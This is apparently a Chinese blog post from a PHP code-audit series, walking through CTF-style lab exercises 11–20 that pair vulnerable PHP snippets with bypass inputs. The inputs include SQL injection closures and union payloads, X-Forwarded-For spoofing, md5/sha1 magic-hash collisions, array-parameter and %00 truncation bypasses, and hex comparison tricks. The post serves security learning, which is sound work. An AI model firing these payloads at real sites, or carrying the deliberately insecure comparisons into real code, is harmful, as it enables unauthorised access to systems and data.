Fork me on GitHub

php代码审计分段学习(php_bug)[2]

参考:https://github.com/bowu678/php_bugs

11.sql闭合绕过

1
$sql = "select user from php where (user='$user') and (pw='$pass')";

嗯好吧这个不就是sqli-labs的Less-3么,放下writeup好了http://localhost/php_bug/11.php/?user=admin')#

12.X-Forwarded-For绕过指定IP地址

1
2
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";}

直接bp抓包,在http头里面加上X-Forwarded-For:1.1.1.1就行了,X-Forwarded-For代表客户端,里面存放的是HTTP端请求的真实ip。

13.md5加密相等绕过

1
2
3
4
5
6
7
8
$a != 'QNKCDZO' && $md51 == $md52,两个字符串不相等但是md5后的值相等,记下writeup。
var_dump(md5('240610708') == md5(''QNKCDZO'));//ture
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));//ture
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));//ture
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));//ture
var_dump('0010e2' == '1e3');//ture
var_dump('0x1234Ab' == '1193131');//ture
var_dump('0xABCdef' == ' 0xABCdef');//ture

==对比的时候会进行数据转换,0eXXXXXXXXX就成0了,如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换为数值并且比较按照数值来进行,嗯还是用===好一些,尽量不要用==。

14.intval函数四舍五入

emmmm,这个函数。。。先是查询的时候intval($_GET['id'])为1024,但是$_GET['id']又不能为1024,直接1024.325加个小数点就行了。。intval会自动将小数点后面的数值舍掉

15 strpos数组绕过NULL与ereg正则%00截断

1
2
@ereg ("^[1-9]+$", $_GET['nctf']
strpos ($_GET['nctf'], '#biubiubiu')

①.这个是要求输入的内容必须为纯数字,但是还有出现#biubiubiu的内容,eregde%00截断可以实现,但是题目上给的#需要url编码一下,要不实现不了。http://localhost/php_bug/15.php?nctf=12414%00%23biubiubiu
②.strpos()找的是字符串,那么传一个数组给它,strpos()出错返回null,null!==false,符合要求. 所以输入nctf[]= ,ereg()在出错时返回的也是null,null!==falsehttp://localhost/php_bug/15.php?nctf[]=

16.SQL注入or绕过

1
2
$query='SELECT * FROM interest WHERE uname=\''.$username.'\' AND pwd=\''.$password.'\';';
$query='SELECT * FROM users WHERE name=\''admin\'\' AND pass=\''or 1 #'\';';

?username=admin\’\’ AND pass=\’’or 1 #&password=
有点传说中的花式闭合的感觉。。

17.密码md5比较绕过

总感觉眼熟,emmm和第九个是一样的。。。

1
?user=' union select '202cb962ac59075b964b07152d234b70' #&pass=123

18.md5()函数===使用数组绕过

1
2
$_GET['username'] == $_GET['password']
md5($_GET['username']) === md5($_GET['password'])

http://localhost/php_bug/18.php?username[]=1&password[]=2,前面已经在sha1()函数比较绕过这个里面详细说过了,,基本同样道理,这里就不多做描述了。

19 ereg()函数strpos() 函数用数组返回NULL绕过

1
2
ereg ("^[a-zA-Z0-9]+$", $_GET['password'])
strpos ($_GET['password'], '--')

emm这个和15是一样的只是ereg()的这个函数现在要求的是只能出现字母和数字,依旧是两种方法

1
2
http://localhost/php_bug/19.php?password[]=
http://localhost/php_bug/19.php?password=12a%00--

20. 十六进制与数字比较

1
2
($digit >= $one) && ($digit <= $nine)
$number == $temp

这个题的要求是输入的数字不能是1~9的数字,但是又要与3735929054相等,转化为16进制

1
2
http://localhost/php_bug/20.php?password=0xdeadc0de
54975581388转换成16进制为ccccccccc

-------------本文结束感谢您的阅读-------------